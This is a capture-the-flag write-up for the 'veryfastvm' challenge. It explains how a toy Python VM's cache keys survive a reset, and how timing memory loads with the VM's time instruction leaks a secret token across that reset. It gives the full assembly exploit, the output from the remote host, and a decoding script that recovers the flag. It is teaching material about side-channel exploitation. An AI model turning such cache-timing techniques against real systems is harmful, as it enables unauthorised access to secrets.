Rating: 5.0

## VM Basics
The VM has a memory size of 1024 * 1024 Bytes, 10 registers, a maximum of 55 instructions and 2000 executed lines. In the following we replace some obfuscated variables with more readable , semantically fitting ones.
The "magic" instruction looks as follows:
```python
elif ins.op == "magic":
if self.reset_counter == 2:
if tuple(self.registers[0:4]) == self.random_token:
with open("flag.txt", "rb") as fp:
cc = fp.read()
cc = cc.strip()
cc = cc.ljust(len(self.registers)*4, b"\x00")
for i in range(len(self.registers)):
self.registers[i] = struct.unpack("<I", cc[i*4:(i+1)*4])[0]
```
The reset_counter starts out at 0 and gets incremented on every reset. This reset happens once when starting the VM, so we need to executed it another time before calling magic. The second check compares the first four registers to a random token that is generated when starting the VM. The random token is inaccessible from the VM's side, however the registers of course are.
When resetting, the memory, registers and cache get cleared, so we cannot directly use the random_token after the reset.
```python
def reset(self):
self.instruction_pointer = 0
self.registers = [0 for r in range(register_count)]
self.memory = [0 for _ in range(memory_size)]
self.instruction_counter = 0
for k in self.memory_cache.keys():
self.memory_cache[k] = 0
self.reset_counter += 1
```
However, the cache values only get set to 0, the keys do not get deleted. We can make use of this because moving a value from memory to a register takes two instructions when the cache is missing, but only one when the cache is hit:
```python
elif ins.op == "movfrom":
memory_address = ins.X10 + self.registers[ins.dsp]
memory_address = memory_address % len(self.memory)
if memory_address in self.memory_cache:
v = self.memory_cache[memory_address]
v = (v & 0xffffffff)
self.registers[ins.X11] = v
self.instruction_pointer += 1
else:
v = self.memory[memory_address]
self.memory_cache[memory_address] = v
self.execute(ins) #cache was not hit, execute another time
```
Combining this with the time instruction lets us store and retrieve one bit:
```python
elif ins.op == "time":
self.registers[0] = self.instruction_counter
self.instruction_pointer += 1
```
To store bit k, we simply load a variable from address X+k if the bit k is 1, if it is zero we do nothing. To load bit k we store the current time in a register, then load the variable from address X+k and check if the loading took one or two instructions by storing the time after loading, and then using the delta between the previous and new time.

This works, even after the VM was reset, as the keys stay.
## Exploit VM Code
We combine this to store each of the four tokens bit by bit, resetting, and then reading it bit by bit. This leads to the following asm, crafted to use less than 55 instructions:
```
#CHECK IF WAS RESET, IF SO JUMP TO DECODE
movfrom r0 0 r0
jmpz 20

#SET CONSTANTS
#CONSTANT 2
movc r7 0x2

#LABEL ENCODE
movfrom r4 0 r3
#set up starting mask
movc r6 0x1

#REGISTERS IN LOOP: r0 temp, r4 variable counter, r6 bitmask, r7 constant=2
#LABEL LOOP
## IF BITMASK 0 THEN JUMP TO ENCODE
mov r0 r6
jmpz 8
## APPLY MASK TO R4
and r0 r4
## SHIFT MASK
mul r6 r7
## INCREMENT ADDR OFFSET
movc r1 0x1
add r5 r1

## JUMP TO LOOP IF R4 AND MASK IS ZERO
jmpz -6
## ELSE LOAD TO CACHE AND JUMP TO LOOP
movfrom r1 9 r5
jmp -8

#Check variable count
movc r0 0x1
add r0 r3
mov r3 r0
movc r4 0x4
#IF r0 > r4 THEN WE ARE DONE WITH ENCODE
jmpg r4 2
#JUMP TO START OF ENCODE NEXT VARIABLE
jmp -16

#DONE WITH ENCODE, RESET
reset

#DECODE SETUP
#PRE LOOP
#REGISTERS IN THIS LOOP: r9 bitmask, r5 temp variable for token construction, r8 memory offset
movc r9 0x1
movc r5 0x0

#DECODE
movc r2 0x4
#MEASURE TIME START
time
mov r1 r0
#LOAD FROM CACHE/MEM
movfrom r7 10 r8
#MEASURE TIME END LOAD
time
#SUB START FROM END
sub r0 r1
#SUB 4 FROM START
sub r0 r2

#IF r0 IS ZERO, THE BIT IS PRESENT AND WE OR THE BIT(mask) INTO THE TEMP TOKEN (r5)
jmpz 2
or r5 r9

#SHIFT BITMASK
movc r1 0x2
mul r9 r1
#INCREMENT MEMORY OFFSET
movc r1 0x1
add r8 r1

#IF BITMASK WAS 0 THEN IT OVERFLOWED SO WE ARE DONE WITH THE LOOP/TOKEN
mov r0 r9
jmpz 2
#JUMP TO START OF LOOP TO HANDLE NEXT BIT
jmp -15

#DONE WITH THIS LOOP, STORE THE ASSEMBLED TOKEN IN MEMORY
movto r5 0 r6
#INCREMENT TOKEN OFFSET BY ONE
movc r1 0x1
add r6 r1
#CHECK IF WE ARE DONE WITH THE ENTIRE DECODE
mov r0 r6
movc r1 0x3
jmpg r1 2
#WE ARE NOT DONE WITH DECODE, JUMP TO DECODE NEXT TOKEN
jmp -24

#DONE DECODING NOW IT'S TIME FOR MAGIC
#LOAD TOKENS FROM MEMORY INTO REGISTERS
movc r9 0x0
movfrom r0 0 r9
movfrom r1 1 r9
movfrom r2 2 r9
movfrom r3 3 r9
#GET FLAG
magic
```
Sending this code to the remote host gives back the register values 1718903650, 1664377723, 1735289192, 1601399135, 2037527414, 1869571935, 8220516. These can be parsed by the following python script:
```
nums = [1718903650, 1664377723, 1735289192, 1601399135, 2037527414, 1869571935, 8220516]

bytes = [a.to_bytes(4, 'little') for a in nums]
unpacked_bytes = [item for sublist in bytes for item in sublist]
chars = [chr(a) for a in unpacked_bytes]
print("flag: " + "".join(chars))
```
Which results in the flag:
```
bctf{c4ching_is_v3ry_goodo}
```

Original writeup (https://ctf.quexten.com/bo1lers-ctf/veryfastvm).